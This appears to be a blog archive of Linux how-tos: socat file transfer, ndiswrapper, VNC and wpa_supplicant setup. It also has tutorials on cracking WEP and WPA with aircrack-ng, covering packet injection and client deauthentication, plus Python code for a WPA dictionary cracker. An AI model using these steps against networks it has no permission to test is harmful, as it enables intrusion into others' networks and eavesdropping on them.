
Monday, October 15, 2012

Linux: Transmitting a Bunch of Files using socat


socat is a versatile tool for relaying data between two endpoints of almost any kind (TCP, UDP, SCTP, TLS, pipes, files, child processes). It does not encrypt anything by itself: the channel is only as secure as the address types you pick, and the OPENSSL address used in the second method below is what adds encryption and certificate authentication. To install socat on Debian, use apt-get:



apt-get install socat


I used socat and tar to duplicate the contents of an entire filesystem between two computers: all files in partition /dev/sda5 on box A were copied to partition /dev/sdb6 on box B (IP 192.168.200.83). The first method sends everything in the clear; the second wraps the same tar pipeline in SSL.



Using the SCTP protocol



This method involves no encryption or authentication, so it is the simpler of the two to follow. Anyone on the path can read the tar stream, and whoever connects to port 7749 first gets to feed tar on box B, so use it only on a trusted network segment. SCTP support must be present in the kernel on both hosts (the sctp module on Linux).




  1. First, I opened a terminal at box B (192.168.200.83) and changed the current directory to /mnt/sdb6 where I will unpack the incoming stream of files.


    cd /mnt/sdb6

    Then, I typed the following command to have socat listen for an SCTP connection on port 7749 and hand whatever arrives to tar, which unpacks it into the current directory:


    socat EXEC:"tar xzf -" SCTP4-LISTEN:7749

  2. Then, I opened a terminal at box A. Here I would transmit a bunch of files to box B (192.168.200.83). I changed directory to /mnt/sda5 containing files to send.


    cd /mnt/sda5

    Then, I typed the following command to transmit all the files in the current directory. Run both ends as root so that tar preserves ownership, permissions and special files; when mirroring a whole partition, add --one-file-system to tar so that nothing mounted below /mnt/sda5 is swept into the archive.


    socat EXEC:"tar czf - ." SCTP4-CONNECT:192.168.200.83:7749



Using an SSL connection



This method encrypts the link and authenticates both ends, so it requires SSL certificates on both sides: each socat presents its own certificate and checks the peer's certificate against the file named in cafile. Read this post to learn how to create self-signed SSL certificates if you don't already have one.




  1. Debian and Ubuntu (through the ssl-cert package) automatically create a local self-signed certificate at /etc/ssl/certs/ssl-cert-snakeoil.pem, with its private key in /etc/ssl/private/ssl-cert-snakeoil.key. Box A and box B must each hold a copy of the other's ssl-cert-snakeoil.pem; below they are saved as box-A.pem and box-B.pem. Copy them over a channel you trust (scp, or by hand), because a substituted certificate would let an attacker impersonate the peer. The private keys stay where they are.



  2. On box B, I typed the following command to run socat in SSL listening mode on port 7749. Giving cafile on the listener makes socat request the client's certificate and accept only box A's, so the connection is mutually authenticated:

    cd /mnt/sdb6
    socat EXEC:"tar xzf -" OPENSSL-LISTEN:7749,reuseaddr,cert=/etc/ssl/certs/ssl-cert-snakeoil.pem,key=/etc/ssl/private/ssl-cert-snakeoil.key,cafile=box-A.pem


  3. On box A, I typed the following command to run socat as an SSL client while tar packs all the files and sends them through the pipeline. cafile=box-B.pem pins the server to box B's self-signed certificate: any other certificate is rejected and no data is sent.

    cd /mnt/sda5
    socat EXEC:"tar czf - ." OPENSSL:192.168.200.83:7749,cert=/etc/ssl/certs/ssl-cert-snakeoil.pem,key=/etc/ssl/private/ssl-cert-snakeoil.key,cafile=box-B.pem




Thus I duplicated the whole directory tree from box A to box B. Using socat and tar, I was able to mirror a filesystem over the network. As shown above, socat can stand in for netcat, and with its OPENSSL addresses for some jobs that would otherwise call for ssh or scp. socat has many other features I have yet to explore.
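A dropped connection truncates the tar stream, and the exit status of the tar running inside EXEC: is easy to miss, so after the transfer a practitioner will want to confirm that the mirror is complete. The following is an added example for this page (not code from the original post): it hashes every file under a directory and compares the two trees. Run `python3 mirrorcheck.py save /mnt/sda5 > manifest.json` on box A, copy manifest.json to box B, and run `python3 mirrorcheck.py check /mnt/sdb6 manifest.json` there. The script name and the JSON manifest format are this example's own choices; the trees in selfcheck() are constructed.

```python
import hashlib
import json
import os
import shutil
import sys
import tempfile


def build_manifest(root):
    """Map every relative path under root to a descriptor: the SHA-256 of a
    regular file, or the target of a symlink, so that a link turned into a
    copy (or a copy into a link) is reported rather than silently accepted."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # os.walk lists symlinks to directories in dirnames without entering them
        linked_dirs = [d for d in dirnames if os.path.islink(os.path.join(dirpath, d))]
        for name in filenames + linked_dirs:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full):
                manifest[rel] = "link:" + os.readlink(full)
                continue
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            manifest[rel] = "sha256:" + h.hexdigest()
    return manifest


def diff_manifests(source, mirror):
    """Return (missing, extra, changed): paths absent from the mirror, paths
    only present in the mirror, and paths whose content or link target differs."""
    missing = sorted(p for p in source if p not in mirror)
    extra = sorted(p for p in mirror if p not in source)
    changed = sorted(p for p in source if p in mirror and source[p] != mirror[p])
    return missing, extra, changed


def selfcheck():
    """Exercise the comparison on a constructed pair of trees and return
    (intact_before_tampering, changed_paths_after_tampering)."""
    base = tempfile.mkdtemp()
    try:
        src, dst = os.path.join(base, "src"), os.path.join(base, "dst")
        for root in (src, dst):
            os.makedirs(os.path.join(root, "etc"))
            with open(os.path.join(root, "etc", "hostname"), "w") as f:
                f.write("boxA\n")
            os.symlink("hostname", os.path.join(root, "etc", "alias"))
        intact = diff_manifests(build_manifest(src), build_manifest(dst)) == ([], [], [])
        with open(os.path.join(dst, "etc", "hostname"), "w") as f:
            f.write("boxB\n")  # simulate a corrupted file on the mirror
        _, _, changed = diff_manifests(build_manifest(src), build_manifest(dst))
        return intact, changed
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    mode, root = sys.argv[1], sys.argv[2]
    if mode == "save":
        json.dump(build_manifest(root), sys.stdout)
    elif mode == "check":
        with open(sys.argv[3]) as f:
            missing, extra, changed = diff_manifests(json.load(f), build_manifest(root))
        for label, paths in (("missing", missing), ("extra", extra), ("changed", changed)):
            for p in paths:
                print(label, p)
        sys.exit(0 if not (missing or extra or changed) else 1)
```

Run the check as root on box B so that every file is readable; a non-zero exit means the mirror differs and the transfer should be repeated.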

Sunday, September 30, 2012

To Compile ndiswrapper 1.58rc1 for Linux 3.5.4

ndiswrapper lets Linux use Windows NDIS drivers for PCI/USB network adapters. If you own a network device for which Linux support is still absent or immature, you can compile ndiswrapper yourself and install the Windows driver for it. Today's Linux supports most network devices out of the box, so most distributions no longer bother to include ndiswrapper. However, I am compiling ndiswrapper believing that Windows NDIS drivers would outperform native Linux drivers. Keep in mind that the Windows driver binary then runs inside the kernel with full privileges, so only use driver files obtained from the vendor.





To my surprise, building the latest version of ndiswrapper (1.58rc1) did not require any patch. After compiling Linux 3.5.4, I downloaded the ndiswrapper source from the sourceforge site. I chose the testing version because I thought it would work better with Linux 3.5.x. I unpacked the source.



tar xzvf ndiswrapper-1.58rc1.tar.gz
cd ndiswrapper-1.58rc1


I typed the following commands to compile and install ndiswrapper.



KVERS=3.5.4 make uninstall
KVERS=3.5.4 make
KVERS=3.5.4 make install


Then, I regenerated the modules.* files (modules.dep and friends) so that modprobe can find the new module:



depmod -e -m -F /boot/System.map-3.5.4 3.5.4


The following files were installed by ndiswrapper.



/lib/modules/3.5.4/misc/ndiswrapper.ko
/sbin/loadndisdriver
/usr/sbin/ndiswrapper
/usr/sbin/ndiswrapper-buginfo
/usr/share/man/man8/loadndisdriver.8
/usr/share/man/man8/ndiswrapper.8



Friday, June 5, 2009

VNC4 vs TightVNC

A frequent question from people setting up VNC is what the differences between VNC4 and TightVNC are. They are summarized in the table below.





                            VNC4                                   TightVNC
Developer                   RealVNC Limited                        TightVNC.com
License                     Only the free edition is open source   Open source
Platform                    Windows, Linux                         Windows, Linux
Installed size              4648 KB                                1432 KB
Linux dependencies          libsm6, libstdc++6, libxext6, zlib1g   libxext6, libjpeg62, zlib1g
Supported encodings         ZRLE, Hextile, Raw                     copyrect, tight, hextile, zlib, corre, rre, raw
Inetd modes supported       wait, nowait                           nowait
Shared sessions from inetd  Shared, non-shared                     Non-shared

Sunday, May 31, 2009

Manually Starting a VNC Server

Manually starting a VNC server is useful for testing. Once VNC works, you can copy the command line into a script or inetd.conf. First, I created an executable script ~/.vnc/xstartup with the following contents:


#!/bin/sh

exec /etc/X11/Xsession

This file has to be made executable, of course. Prior to starting vnc4server, make sure your X session can start normally by checking your ~/.xsession file. My .xsession file looks like this:


#!/bin/sh

exec openbox

Then, I started vnc4server:


vnc4server -geometry 800x600 -depth 16 -name VNC4

The first time you run vnc4server, it will ask you for a password. Choose one that only you can guess and memorize it, keeping in mind that VNC passwords are truncated to 8 characters and the classic VNC authentication is a weak DES challenge-response, so never expose the VNC port to an untrusted network; tunnel it through SSH instead. Next, I installed the TightVNC U3 package on my SanDisk U3 flash drive. I went over to another PC running Windows and plugged in the USB flash drive. The U3 menu popped up and I clicked on the TightVNC icon. Then, I specified the address of my Linux box running vnc4server:


192.168.1.234:1 or

192.168.1.234::5901

After I was done with the VNC session, I killed vnc4server with the following command:


vnc4server -kill :1

When VNC sessions don't seem to work, check the log file: ~/.vnc/*.log



Connecting to a VNC Server through a SSH Tunnel

For security and privacy, VNC connections should be made through an SSH tunnel. Here, I am using PuTTY to set up the tunnel. First, type in the host name:



Next, type in the user name:



Set any other connection options you need under Connection > SSH. The post originally moved Blowfish to the top of the cipher list for speed; on current PuTTY versions keep the default order with AES first, since Blowfish is a 64-bit-block cipher and is no longer recommended.



Set up the SSH tunnel under Connection > SSH > Tunnels. The Source port is the local port the VNC viewer will connect to. The Destination is the VNC server's address as seen from the SSH server, in host:port form, for example localhost:5901 for display :1. Click the Add button:



Save the PuTTY session.



Now that the SSH tunnel is set up, you can use a VNC viewer like TightVNC to connect through it to the remote VNC server by pointing the viewer at the local end of the tunnel. For example, if the Source port was 5900, specify localhost::5900 as the server host in TightVNC. Only the SSH port needs to be reachable from outside; the VNC port itself can be firewalled off or bound to localhost.



Friday, May 22, 2009

Remote Desktop Session with VNC4Server & TightVNC

We are in a computing era in which we run applications on remote computers and servers. There are many ways to have a remote desktop session: RDP, NX and VNC are all protocols designed for it. Of those, VNC is the most widely supported. This post covers several ways of setting up and using VNC on Linux and Windows. Below I explain how I set up a VNC session between my Linux box and a TightVNC viewer running on a Windows PC.



Setting up Inetd to start VNC on Incoming Connections


First, I installed vnc4server on my Debian Linux box. Alternatively, I could install tightvncserver instead. TightVNC is lighter than vnc4server. Anyway, to have inetd automatically start a VNC server on incoming connections, I added the following line to my /etc/inetd.conf file. This is all one line:


5995 stream tcp,rcvbuf=64k,sndbuf=256k wait nobody:nogroup /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 960x600 -depth 16 -AlwaysShared -rfbauth /etc/vnc/passwd -desktop myOffice -dpi 96 -fp /usr/share/fonts/X11/Type1 -co /etc/X11/rgb

For tightvncserver, the inetd.conf line would look slightly different because tightvncserver panics when wait is used instead of nowait. This means that tightvncserver sessions can never be shared when started from inetd:


5960 stream tcp,rcvbuf=64k,sndbuf=256k nowait nobody:nogroup /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 960x600 -depth 16 -desktop myOffice -dpi 96 -fp /usr/share/fonts/X11/Type1 -co /etc/X11/rgb

Typical port values are in the range from 5900 to 5999. Make sure everything in the following checklist is OK for VNC to work:



  • A display manager, such as gdm, kdm, xdm or wdm, must be running and set up to accept XDMCP requests. Read the sections below about setting up XDMCP for VNC sessions.
  • A VNC password must be created and stored in /etc/vnc/passwd, readable by the user Xvnc runs as (nobody in the inetd lines above). Do not make it world-readable: the file only obfuscates the password with a fixed DES key, and any local user could recover the password from a mode 644 file. To create it, run:

    vncpasswd

    mkdir /etc/vnc

    mv ~/.vnc/passwd /etc/vnc

    chown nobody:nogroup /etc/vnc/passwd

    chmod 400 /etc/vnc/passwd

  • At least, fixed and cursor fonts must be present in the default font paths. If not, specify the font paths with -fp parameter.

Tell inetd to reload settings in /etc/inetd.conf with the following command:


kill -1 $(pidof inetd)


Setting up GDM to handle VNC logins


It is rather simple to make GDM accept XDMCP requests from a VNC server. Open the file /etc/gdm/gdm.conf and add the following lines in the [XDMCP] section:


[xdmcp]

Enable=true

Port=177

DisplaysPerHost=8

The lines above enable GDM to accept logins at UDP port 177. Also, GDM is set up to accept up to 8 users from localhost. Otherwise, GDM may refuse remote logins through SSH tunnel when there are already a couple of users logged in at localhost.


XDMCP has no authentication of its own, so enabling it exposes the login manager to the network on UDP port 177. For security, restrict it to the local Xvnc by adding the following line to /etc/hosts.deny:


gdm: ALL

Then, add the following line to /etc/hosts.allow:


gdm: 127.0.0.1


Setting up XDM for use with VNC


XDM is lighter than gdm or kdm, so XDM is ideal for VNC sessions where network bandwidth and CPU resource are precious. In fact, XDM can coexist with gdm or kdm. In Debian, set HEED_DEFAULT_DISPLAY_MANAGER to false in the script /etc/init.d/xdm:


[ -z "$HEED_DEFAULT_DISPLAY_MANAGER" ] && HEED_DEFAULT_DISPLAY_MANAGER=false

To set up XDM to handle VNC logins and deliver a user's desktop, XDMCP support has to be enabled first. Open the file /etc/X11/xdm/xdm-config and locate the following line:


DisplayManager.requestPort: 0

Change the number 0 to 177. Then, open the file /etc/X11/xdm/Xaccess and specify the range of addresses to allow access to XDM. Usually, it is sufficient to add only the following lines to /etc/X11/xdm/Xaccess:


localhost

127.0.0.1

Optionally, you can change the look of the login screen. Open the file /etc/X11/xdm/Xsetup and enter a command to set the background image:


#!/bin/sh

hsetroot -fill /usr/local/share/pixmaps/Repressed.jpg

You can also change the welcome line and the face image by editing the file /etc/X11/xdm/Xresources:


xlogin*greeting: Remote VNC Session

xlogin*logoFileName: /usr/share/X11/xdm/pixmaps/xorg.xpm




Using TightVNC in Windows to Run a Linux Desktop


I installed TightVNC U3 package on my USB thumbdrive so I can connect to my VNC server anywhere. However, I had to tweak TightVNC a little bit to open a VNC session to my Linux desktop.



The default encoding Tight doesn't work well with vnc4server. So I had to change it to CoRRE.



Thursday, April 23, 2009

Linux: Connecting to Wireless Networks with wpa_supplicant

Connecting to a wireless network in Linux is easy with wpa_supplicant. If you haven't, install the wpasupplicant package first. Also, install wireless-tools.



Of course, the driver for the wireless adapter has to be installed and loaded too. You can either use Linux native driver or Windows NDIS driver for your wireless device. The Linux kernel itself provides native driver modules for popular wireless chips. Alternatively, you can use a Windows driver in Linux with the help of ndiswrapper. I prefer using ndiswrapper to enable my wireless adapters. Once ndiswrapper is configured correctly, the following command will load the driver for the wireless network adapter.



modprobe ndiswrapper


In order to control wpa_supplicant with wpa_cli and wpa_gui, add yourself to the netdev group; the ctrl_interface line in the configuration below grants that group access to the control socket.


adduser username netdev

To automatically have wpasupplicant take care of wireless connections, you should edit two files, /etc/network/interfaces and /etc/wpa_supplicant/wpa_supplicant.conf. The following is a sample /etc/network/interfaces file.



auto lo wlan1

iface lo inet loopback

iface default inet dhcp

iface WPA_hidden inet static
address 192.168.1.250
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

iface wlan1 inet manual
wpa-driver wext
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf


Then, you need to create the configuration file /etc/wpa_supplicant/wpa_supplicant.conf. Its contents typically look like this:



ap_scan=1
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

network={
ssid="MyWifiNet"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA
pairwise=TKIP
group=TKIP
psk="WPA password"
id_str="WPA_hidden"
}

network={
ssid="linksys"
key_mgmt=NONE
wep_key0=e2c45314910abf72e871beda87
wep_tx_keyidx=0
}


In the example above, the ssid= and psk= lines must be adjusted for each wireless network. The first network uses WPA with TKIP; on any access point that supports it, prefer WPA2 with proto=RSN and pairwise=CCMP, since TKIP and WEP are both broken. The second network, linksys, is an example of a WEP network and is shown only for completeness. Because the file holds the passphrase in clear, keep it readable by root only (chmod 600). Next, run the following command to start a WPA connection to your wireless network.



wpa_supplicant -c /etc/wpa_supplicant/wpa_supplicant.conf -i wlan1 -B


The steps below finalize the wireless network setup by hand. If you use the /etc/network/interfaces file above, ifup wlan1 does all of this (including starting wpa_supplicant) for you.



ifconfig wlan1 192.168.1.201 up

route add default gw 192.168.1.1


Additionally, check /etc/resolv.conf, which lists the DNS servers.



To Kill WPA_supplicant


To terminate wpa_supplicant, execute wpa_cli and type the following commands:


terminate
quit

Sunday, January 4, 2009

Hacking WEP with Backtrack 3

Today, we commonly find wireless networks around us. Most are encrypted with WEP or WPA. I covered the dictionary attack on WPA networks in a previous post. Compared to WPA, WEP's design is weak, and its key can be recovered from captured traffic alone.


Theory


At the time of its conception, WEP, short for Wired Equivalent Privacy, was believed to be secure. WEP encrypts each frame with RC4 keyed by a 24-bit initialization vector (IV) prepended to the shared key, and the IV is sent in the clear. The IV space is so small that IVs repeat, which reuses keystream, and certain IV values leak information about the key bytes, so the key can be recovered once enough frames with their IVs have been collected. This tutorial exploits that weakness. However, a problem may arise when there are multiple keys in use instead of just one.
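The keystream-reuse half of that weakness can be shown in a few lines. The following is an added example for this page (not the original post's code and not aircrack-ng's): it implements RC4 and WEP's IV||key construction and demonstrates that two frames sent under the same IV share a keystream, so one known plaintext (the fixed LLC/SNAP header of an ARP packet, which is also why ARP frames are the replay vehicle later on) decrypts the other frame. The key and the frames are constructed here. aircrack-ng's statistical attacks (FMS, KoreK, PTW) go further and recover the key itself; they are not reproduced here.

```python
import math

# Constructed 104-bit WEP key for the demonstration (not a real network's key)
DEMO_KEY = bytes.fromhex("0102030405060708090a0b0c0d")
# LLC/SNAP header + ARP ethertype: the first 8 plaintext bytes of every ARP
# packet on a WEP network, which makes ARP frames known plaintext.
ARP_SNAP_HEADER = bytes.fromhex("aaaa030000000806")


def rc4(key, length):
    """Generate `length` bytes of RC4 keystream for `key` (KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, key, plaintext):
    """WEP frame body: the 3-byte IV goes out in clear, followed by
    plaintext XOR RC4(IV || key). The CRC-32 ICV is left out here."""
    assert len(iv) == 3
    return iv + xor(plaintext, rc4(iv + key, len(plaintext)))


def group_by_iv(frames):
    """Bucket captured frame bodies by IV; any bucket holding more than one
    frame is keystream reuse."""
    buckets = {}
    for frame in frames:
        buckets.setdefault(frame[:3], []).append(frame[3:])
    return {iv: cts for iv, cts in buckets.items() if len(cts) > 1}


def decrypt_via_known_plaintext(known_frame, known_plaintext, target_frame):
    """Recover keystream from a frame whose plaintext prefix is known and use
    it to decrypt another frame that reused the same IV. Returns as many
    bytes as the known plaintext covers."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("frames do not share an IV")
    keystream = xor(known_frame[3:], known_plaintext)
    return xor(target_frame[3:], keystream)


def frames_for_collision(probability=0.5, iv_bits=24):
    """Birthday bound: frames needed before some IV repeats with the given
    probability (about 4800 for a 24-bit IV at 50%)."""
    n = 2 ** iv_bits
    return math.sqrt(2 * n * math.log(1 / (1 - probability)))


def demo():
    """Capture three constructed frames, two under the same IV, and decrypt
    the start of the non-ARP one using the ARP frame as known plaintext."""
    iv = b"\x11\x22\x33"
    arp = ARP_SNAP_HEADER + bytes(20)              # constructed ARP packet
    secret = b"GET /login?user=admin&pw=hunter2"    # constructed second frame
    captured = [
        wep_encrypt(iv, DEMO_KEY, arp),
        wep_encrypt(b"\x44\x55\x66", DEMO_KEY, b"unrelated"),
        wep_encrypt(iv, DEMO_KEY, secret),
    ]
    reused = group_by_iv(captured)
    recovered = decrypt_via_known_plaintext(captured[0], ARP_SNAP_HEADER, captured[2])
    return sorted(reused), recovered
```

Each replayed ARP request the access point answers yields another frame under a fresh IV, which is exactly the supply of IVs airodump-ng collects below; with a longer known plaintext the recovered keystream decrypts correspondingly more of every colliding frame.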


What's Needed To Test Your Wireless Network


To crack WEP, you need a Backtrack CD and basic knowledge of Linux. Backtrack is a Linux live CD carrying a collection of network security testing tools. Download Backtrack and burn it onto a blank CD with InfraRecorder or any other tool.


Then, boot your computer with the Backtrack CD. Hopefully, you'll be automatically presented with a nice and dark GUI screen of KDE.



Surveying Wireless Networks with Kismet


Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Save kismet.conf and start kismet.

Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:



  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

In Kismet, the flags for encryption are Y (WEP), N (No encryption), or O (WPA/WPA2). Press x to close popup windows and Q to exit Kismet.



Dumping Wireless Traffic with Airodump


To hack WEP, you need to use airodump-ng to sniff wireless traffic of the target network and collect good IV's (initialization vectors, a part of WEP encryption data). Type the following commands in a terminal window:


airmon-ng stop wlan0

airmon-ng start wlan0

airodump-ng -w logfile -c 9 --ivs wlan0

The commands above put the network device wlan0 in monitor mode and then use airodump-ng to log the wireless traffic. The -c option specifies the channel to listen to. The screen will show wireless networks and associated clients, if any, with a set of numbers increasing. Don't stop airodump-ng or close the terminal yet. Just leave the terminal open.



Using Aireplay-NG To Generate Traffic


Aireplay-ng is a handy tool that can be used to generate more wireless traffic in order to collect enough good IV's. It does so by injecting or replaying captured packets to fool the access point into giving us what we need.



To Force Association of Clients with Access Point


Open another terminal and enter the following command to associate the target wireless client with the access point:


aireplay-ng -1 30 -e belkin -a 00:11:22:33:44:55 -h 00:fe:21:83:f4:e5 wlan0

The -e option specifies the network name, the -a option the MAC address of the AP, and the -h option the source MAC address to authenticate with, which must be your own card's MAC (or one you set with macchanger) since the AP addresses its replies to it. The 30 is the interval in seconds between re-associations.


You can use macchanger to view and change your MAC address; for example, macchanger -s wlan0 shows it. Fake authentication lets you associate your own adapter when no client is connected to the wireless network in the first place, so that the injection below has an associated MAC to work with.



ARP Injection with Aireplay


ARP request replay is the most reliable way to generate IVs quickly: the access point re-encrypts every replayed ARP request under a fresh IV. While airodump-ng is listening, run the following command:


aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:21:83:f4:e5 wlan0

The -b option specifies the MAC address of the AP and -h the MAC address of an associated client. Let it run and airodump-ng will pick up the traffic. If no client is connected, use the fake authentication described above and give your own MAC as -h.



Interactive Packet Replay


This attack replays captured data packets back to the access point, which re-encrypts and retransmits them, yielding more IVs. The -p 0841 and -c FF:FF:FF:FF:FF:FF options select packets that look as if they came from a wireless client (ToDS) and are addressed to broadcast, so the AP relays them to all stations with a new IV:


aireplay-ng -2 -b <AP> -h <Client MAC> -n 160 -p 0841 -c FF:FF:FF:FF:FF:FF wlan0

Hacking WEP with Aircrack



After collecting enough IV packets, aircrack-ng can be used to crack the WEP key. The syntax of the aircrack-ng command to use is like:


aircrack-ng -a 1 -b A0:B1:C2:D3:E4:F5 -n 128 logfile-01.ivs

Replace the filename with your log file that was previously generated with airodump-ng. Also, specify the access point's MAC address with -b option. The -n option specifies whether the WEP strength is 64-bit or 128-bit. The -a 1 option specifies that we're cracking WEP.



Can't Crack?


If you still can't crack WEP with tons of IV's, increase the fudge factor with -f N option (N>=2). It'll take much longer to crack but you'll have a better chance at success.



Saturday, December 27, 2008

Hacking WPA/WPA2 with Backtrack 3

WPA is an encryption scheme designed to secure the wireless network of your home or office from intruders and eavesdroppers. It is considerably stronger than WEP: with a pre-shared key, the only practical attack is guessing the passphrase offline against a captured handshake, whereas WEP's key can be recovered from captured traffic alone. This tutorial discusses the currently available techniques for testing wireless network security. Be aware that breaking into a network you are not authorised to test is illegal.



What You Need


To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from Remote-Exploit.org and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.


Here's a list of what you need to crack WPA/WPA2:




Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.



Surveying Wireless Networks with Kismet


Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Refer to Kismet documentation section 12. Save kismet.conf and start kismet.


Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:



  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack



This is the classic offline dictionary attack: capture one WPA 4-way handshake, then test candidate passphrases against it until the handshake's MIC checks out.


airmon-ng stop wlan0

airmon-ng start wlan0

The commands above put your wireless device in monitor mode. The monitor mode is the mode whereby your wireless card can listen to wireless traffic passively. Replace wlan0 with your wireless device name, such as eth1. Type iwconfig to make sure your card is in monitor mode.


airodump-ng -w test wlan0

Skip the step above if you used Kismet as in the previous section. Here airodump-ng is used to survey the wi-fi networks. Press Ctrl+C to stop airodump-ng. Copy BSSID (MAC address) of the target network.


airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with --bssid option) on the specified channel (-c option) to the specified log file (-w option). Wait until WPA Handshake message appears on the screen. Then, stop airodump-ng by pressing Ctrl+C.


Optionally, if you see a client connected to the target network but no authentication handshake, then you can deauthenticate the client by running the following example command in a separate terminal:



aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0


where the -a option specifies the access point and -c the client to deauthenticate. The client will normally reconnect and redo the 4-way handshake, which airodump-ng records. Otherwise, you'll have to wait until a handshake message shows up in the airodump-ng output. Then unpack a wordlist and run aircrack-ng:

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt

aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap


This begins the dictionary attack using the saved capture file(s) and the specified wordlist (-w option). For each word, aircrack-ng derives the PMK with PBKDF2 (4096 HMAC-SHA1 iterations, salted with the SSID), derives the handshake keys from it and checks the captured MIC; that derivation is what keeps the rate far below that of ordinary password hash cracking. It may take hours or days depending on the size of the dictionary and the speed of your CPU. If the passphrase is not in the dictionary, for instance because it is a long random string, the attack cannot succeed and you are only wasting time.
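What aircrack-ng does for each dictionary word, and where the hex psk= line that wpa_passphrase writes into wpa_supplicant.conf (the earlier post on wpa_supplicant) comes from, spelled out in Python as an added example for this page; it is not aircrack-ng's or wpa_supplicant's code. It assumes WPA2 with HMAC-SHA1 MICs (key descriptor version 2) and a minimal EAPOL-Key message 2 layout; the handshake it cracks is constructed with random MACs and nonces rather than captured. Message 2 is enough because it carries SNonce and a MIC keyed by the KCK, while ANonce comes from message 1.

```python
import hashlib
import hmac
import os
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    wpa_passphrase prints exactly this value as the hex psk= line, and the
    4096 HMACs per candidate are what makes a dictionary attack slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-512 from 802.11i: expand the PMK with both MAC addresses and both
    nonces. The first 16 bytes of the result are the KCK that keys the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


# Offset of the 16-byte Key MIC field in the EAPOL-Key frame built below:
# 4-byte EAPOL header + 77 bytes of descriptor fields before the MIC.
MIC_OFFSET = 81


def build_eapol_key_frame(snonce, mic=bytes(16)):
    """Minimal EAPOL-Key message 2 (client -> AP): EAPOL header, descriptor
    type 2 (RSN), key info 0x010A (pairwise, MIC, version 2), key length,
    replay counter, SNonce, zero IV/RSC/ID, MIC, empty key data."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1)
    body += snonce + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the whole EAPOL frame
    with the MIC field zeroed, truncated to 16 bytes. WPA/TKIP (version 1)
    uses HMAC-MD5 instead."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, wordlist):
    """Try each candidate passphrase against the captured MIC; return the
    passphrase that reproduces it, or None when the wordlist is exhausted."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def make_handshake(ssid, passphrase):
    """Construct a synthetic handshake (random MACs and nonces), signing
    message 2 the way a real client would, for testing the cracker offline."""
    ap_mac, client_mac = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, client_mac, anonce, snonce)[:16]
    frame = build_eapol_key_frame(snonce)
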